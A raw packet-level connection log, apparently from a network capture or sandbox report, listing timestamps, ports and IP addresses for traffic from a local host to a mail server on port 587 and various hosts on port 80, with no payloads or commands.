Nov 28, 2024 06:41:13.033898115 CET	49741	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:13.033910036 CET	49741	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:13.086731911 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:13.157603979 CET	80	49741	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:13.157617092 CET	80	49741	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:13.374728918 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:13.376226902 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:13.500021935 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:13.801508904 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:13.802608013 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:13.926420927 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:14.211186886 CET	80	49741	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:14.211242914 CET	49741	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:14.211332083 CET	49741	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:14.214092970 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:14.214322090 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:14.335071087 CET	80	49741	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:14.338006020 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:14.629512072 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:14.629714966 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:14.753565073 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:14.998235941 CET	49742	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:15.041439056 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:15.042181015 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:15.042232990 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:15.042258024 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:15.042275906 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:15.122172117 CET	80	49742	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:15.122246981 CET	49742	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:15.154457092 CET	49742	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:15.154475927 CET	49742	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:15.165951014 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:15.165990114 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:15.166085005 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:15.166101933 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:15.278289080 CET	80	49742	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:15.278304100 CET	80	49742	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:15.540689945 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:15.653925896 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:15.998094082 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:16.085556984 CET	49743	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:16.122067928 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:16.209373951 CET	80	49743	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:16.209471941 CET	49743	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:16.209794998 CET	49743	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:16.209805012 CET	49743	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:16.333512068 CET	80	49743	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:16.333537102 CET	80	49743	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:16.409898996 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:16.410379887 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:16.411565065 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:16.535264015 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:16.535342932 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:17.247318983 CET	80	49742	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:17.247339010 CET	80	49742	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:17.247505903 CET	49742	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:17.247545004 CET	49742	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:17.371439934 CET	80	49742	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:17.603754997 CET	80	49743	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:17.603821039 CET	80	49743	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:17.603868008 CET	49743	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:18.753132105 CET	49746	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:18.762631893 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:18.762768984 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:18.877079964 CET	80	49746	82.112.184.197	192.168.2.4
Nov 28, 2024 06:41:18.877161980 CET	49746	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:18.877469063 CET	49746	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:18.877494097 CET	49746	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:18.884776115 CET	49747	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:18.886485100 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:19.001318932 CET	80	49746	82.112.184.197	192.168.2.4
Nov 28, 2024 06:41:19.001352072 CET	80	49746	82.112.184.197	192.168.2.4
Nov 28, 2024 06:41:19.008572102 CET	80	49747	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:19.008675098 CET	49747	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:19.012722015 CET	49747	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:19.012794971 CET	49747	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:19.103282928 CET	49743	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:19.136543036 CET	80	49747	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:19.136648893 CET	80	49747	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:19.175647974 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:19.175888062 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:19.299748898 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:19.589180946 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:19.598748922 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:19.722692013 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:20.020131111 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:20.020200968 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:20.020237923 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:20.020286083 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:20.022514105 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:20.146289110 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:20.422471046 CET	80	49747	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:20.422533035 CET	80	49747	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:20.422729969 CET	49747	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:20.435506105 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:20.436534882 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:20.560343981 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:20.849225044 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:20.854386091 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:20.978182077 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:21.267849922 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:21.270351887 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:21.394139051 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:21.689914942 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:21.706859112 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:21.830683947 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:22.119802952 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:22.119995117 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.243803024 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:22.537101984 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:22.537305117 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.661160946 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:22.950014114 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:22.951351881 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.951458931 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.951505899 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.951581001 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.951639891 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.951639891 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.951663971 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.951663971 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:22.951714039 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:23.075216055 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075251102 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075335979 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075366020 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075392962 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075458050 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075484037 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075639009 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075678110 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075705051 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075754881 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.075782061 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.380354881 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:23.466715097 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:23.575442076 CET	49747	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:40.798821926 CET	80	49746	82.112.184.197	192.168.2.4
Nov 28, 2024 06:41:40.798934937 CET	49746	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:40.821427107 CET	49746	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:40.945241928 CET	80	49746	82.112.184.197	192.168.2.4
Nov 28, 2024 06:41:41.064559937 CET	49753	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:41.188441992 CET	80	49753	82.112.184.197	192.168.2.4
Nov 28, 2024 06:41:41.188541889 CET	49753	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:41.192142010 CET	49753	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:41.192178965 CET	49753	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:41:41.317184925 CET	80	49753	82.112.184.197	192.168.2.4
Nov 28, 2024 06:41:41.317298889 CET	80	49753	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:03.143096924 CET	80	49753	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:03.143316031 CET	49753	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:03.143640041 CET	49753	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:03.267293930 CET	80	49753	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:04.159482956 CET	49766	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:04.283173084 CET	80	49766	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:04.285449982 CET	49766	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:04.291003942 CET	49766	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:04.291003942 CET	49766	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:04.414829016 CET	80	49766	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:04.414851904 CET	80	49766	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:12.709769011 CET	80	49734	158.101.44.242	192.168.2.4
Nov 28, 2024 06:42:12.709829092 CET	49734	80	192.168.2.4	158.101.44.242
Nov 28, 2024 06:42:27.308968067 CET	80	49766	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:27.309061050 CET	49766	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:27.309315920 CET	49766	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:27.313781023 CET	49810	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:27.433026075 CET	80	49766	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:27.437509060 CET	80	49810	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:27.437591076 CET	49810	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:27.438092947 CET	49810	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:27.438123941 CET	49810	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:27.562623978 CET	80	49810	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:27.562638998 CET	80	49810	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:47.717294931 CET	49734	80	192.168.2.4	158.101.44.242
Nov 28, 2024 06:42:47.841046095 CET	80	49734	158.101.44.242	192.168.2.4
Nov 28, 2024 06:42:48.982665062 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:42:49.112247944 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:42:49.393804073 CET	80	49810	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:49.393899918 CET	49810	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:49.395845890 CET	49810	80	192.168.2.4	82.112.184.197
Nov 28, 2024 06:42:49.403853893 CET	587	49744	51.195.88.199	192.168.2.4
Nov 28, 2024 06:42:49.405433893 CET	49744	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:42:49.519539118 CET	80	49810	82.112.184.197	192.168.2.4
Nov 28, 2024 06:42:49.862854958 CET	49860	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:42:49.986619949 CET	80	49860	47.129.31.212	192.168.2.4
Nov 28, 2024 06:42:49.986747980 CET	49860	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:42:49.986962080 CET	49860	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:42:49.987052917 CET	49860	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:42:50.110656977 CET	80	49860	47.129.31.212	192.168.2.4
Nov 28, 2024 06:42:50.110671997 CET	80	49860	47.129.31.212	192.168.2.4
Nov 28, 2024 06:42:52.000524998 CET	80	49860	47.129.31.212	192.168.2.4
Nov 28, 2024 06:42:52.000617027 CET	80	49860	47.129.31.212	192.168.2.4
Nov 28, 2024 06:42:52.000911951 CET	49860	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:42:52.000999928 CET	49860	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:42:52.124720097 CET	80	49860	47.129.31.212	192.168.2.4
Nov 28, 2024 06:42:52.475028038 CET	49866	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:42:52.598735094 CET	80	49866	13.251.16.150	192.168.2.4
Nov 28, 2024 06:42:52.598870039 CET	49866	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:42:52.599111080 CET	49866	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:42:52.599111080 CET	49866	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:42:52.723366022 CET	80	49866	13.251.16.150	192.168.2.4
Nov 28, 2024 06:42:52.723377943 CET	80	49866	13.251.16.150	192.168.2.4
Nov 28, 2024 06:42:54.748186111 CET	80	49866	13.251.16.150	192.168.2.4
Nov 28, 2024 06:42:54.748331070 CET	80	49866	13.251.16.150	192.168.2.4
Nov 28, 2024 06:42:54.748400927 CET	49866	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:42:54.748878956 CET	49866	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:42:54.872569084 CET	80	49866	13.251.16.150	192.168.2.4
Nov 28, 2024 06:42:55.230904102 CET	49875	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:42:55.354705095 CET	80	49875	44.221.84.105	192.168.2.4
Nov 28, 2024 06:42:55.354784012 CET	49875	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:42:55.355074883 CET	49875	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:42:55.355074883 CET	49875	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:42:55.478809118 CET	80	49875	44.221.84.105	192.168.2.4
Nov 28, 2024 06:42:55.478822947 CET	80	49875	44.221.84.105	192.168.2.4
Nov 28, 2024 06:42:56.502722979 CET	80	49875	44.221.84.105	192.168.2.4
Nov 28, 2024 06:42:56.502840996 CET	80	49875	44.221.84.105	192.168.2.4
Nov 28, 2024 06:42:56.502932072 CET	49875	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:42:56.503550053 CET	49875	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:42:56.627350092 CET	80	49875	44.221.84.105	192.168.2.4
Nov 28, 2024 06:42:57.190660000 CET	49880	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:42:57.314512014 CET	80	49880	18.141.10.107	192.168.2.4
Nov 28, 2024 06:42:57.314917088 CET	49880	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:42:57.315104961 CET	49880	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:42:57.315164089 CET	49880	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:42:57.438927889 CET	80	49880	18.141.10.107	192.168.2.4
Nov 28, 2024 06:42:57.438949108 CET	80	49880	18.141.10.107	192.168.2.4
Nov 28, 2024 06:42:59.387933016 CET	80	49880	18.141.10.107	192.168.2.4
Nov 28, 2024 06:42:59.387954950 CET	80	49880	18.141.10.107	192.168.2.4
Nov 28, 2024 06:42:59.388020992 CET	49880	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:42:59.388106108 CET	49880	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:42:59.511807919 CET	80	49880	18.141.10.107	192.168.2.4
Nov 28, 2024 06:42:59.705435991 CET	49885	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:42:59.829283953 CET	80	49885	172.234.222.143	192.168.2.4
Nov 28, 2024 06:42:59.834373951 CET	49885	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:42:59.834724903 CET	49885	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:42:59.834789991 CET	49885	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:42:59.958453894 CET	80	49885	172.234.222.143	192.168.2.4
Nov 28, 2024 06:42:59.958466053 CET	80	49885	172.234.222.143	192.168.2.4
Nov 28, 2024 06:43:01.013959885 CET	80	49885	172.234.222.143	192.168.2.4
Nov 28, 2024 06:43:01.014027119 CET	49885	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:43:01.014477968 CET	49885	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:43:01.016073942 CET	49887	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:43:01.138114929 CET	80	49885	172.234.222.143	192.168.2.4
Nov 28, 2024 06:43:01.139704943 CET	80	49887	172.234.222.143	192.168.2.4
Nov 28, 2024 06:43:01.142906904 CET	49887	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:43:01.143095016 CET	49887	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:43:01.143116951 CET	49887	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:43:01.266897917 CET	80	49887	172.234.222.143	192.168.2.4
Nov 28, 2024 06:43:01.266912937 CET	80	49887	172.234.222.143	192.168.2.4
Nov 28, 2024 06:43:02.398886919 CET	80	49887	172.234.222.143	192.168.2.4
Nov 28, 2024 06:43:02.398947001 CET	49887	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:43:02.428322077 CET	49887	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:43:02.552104950 CET	80	49887	172.234.222.143	192.168.2.4
Nov 28, 2024 06:43:02.908171892 CET	49890	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:43:03.032006025 CET	80	49890	34.246.200.160	192.168.2.4
Nov 28, 2024 06:43:03.033494949 CET	49890	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:43:03.034466982 CET	49890	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:43:03.034507990 CET	49890	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:43:03.158148050 CET	80	49890	34.246.200.160	192.168.2.4
Nov 28, 2024 06:43:03.158160925 CET	80	49890	34.246.200.160	192.168.2.4
Nov 28, 2024 06:43:04.468040943 CET	80	49890	34.246.200.160	192.168.2.4
Nov 28, 2024 06:43:04.468059063 CET	80	49890	34.246.200.160	192.168.2.4
Nov 28, 2024 06:43:04.468123913 CET	49890	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:43:04.468220949 CET	49890	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:43:04.592025995 CET	80	49890	34.246.200.160	192.168.2.4
Nov 28, 2024 06:43:05.311273098 CET	49896	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:05.435168982 CET	80	49896	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:05.435746908 CET	49896	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:05.436033010 CET	49896	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:05.436098099 CET	49896	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:05.560714006 CET	80	49896	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:05.560741901 CET	80	49896	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:06.585114956 CET	80	49896	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:06.585397959 CET	80	49896	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:06.585463047 CET	49896	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:06.585561037 CET	49896	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:06.709429026 CET	80	49896	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:07.278050900 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:07.401957035 CET	80	49900	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:07.402046919 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:07.402229071 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:07.402255058 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:07.526046991 CET	80	49900	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:07.526098013 CET	80	49900	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:08.529895067 CET	80	49900	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:08.535788059 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:08.535844088 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:08.659703016 CET	80	49900	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:08.659713030 CET	80	49900	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:08.873482943 CET	80	49900	208.100.26.245	192.168.2.4
Nov 28, 2024 06:43:09.029206991 CET	49900	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:43:09.376369953 CET	49904	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:43:09.501091003 CET	80	49904	13.251.16.150	192.168.2.4
Nov 28, 2024 06:43:09.502914906 CET	49904	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:43:09.503041983 CET	49904	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:43:09.503060102 CET	49904	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:43:09.626806974 CET	80	49904	13.251.16.150	192.168.2.4
Nov 28, 2024 06:43:09.626840115 CET	80	49904	13.251.16.150	192.168.2.4
Nov 28, 2024 06:43:10.107064962 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:10.226037979 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:10.231365919 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:10.231643915 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:10.349920988 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:10.349999905 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:11.524255037 CET	80	49904	13.251.16.150	192.168.2.4
Nov 28, 2024 06:43:11.524336100 CET	80	49904	13.251.16.150	192.168.2.4
Nov 28, 2024 06:43:11.524424076 CET	49904	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:43:11.524516106 CET	49904	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:43:11.648458004 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:11.648504972 CET	80	49904	13.251.16.150	192.168.2.4
Nov 28, 2024 06:43:11.648516893 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:11.648755074 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:11.648752928 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:11.772763968 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:11.772780895 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.037606001 CET	49907	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:12.061531067 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.061908960 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:12.064930916 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.066971064 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:12.161377907 CET	80	49907	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:12.161462069 CET	49907	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:12.161953926 CET	49907	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:12.161983967 CET	49907	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:12.185677052 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.190836906 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.285706997 CET	80	49907	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:12.285753965 CET	80	49907	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:12.474795103 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.475378990 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:12.483424902 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.487389088 CET	49906	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:12.599205017 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.611272097 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.893591881 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.893637896 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.893655062 CET	587	49905	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.893702984 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:12.896908998 CET	49905	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:12.910624981 CET	587	49906	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:12.910667896 CET	587	49906	51.195.88.199	192.168.2.4
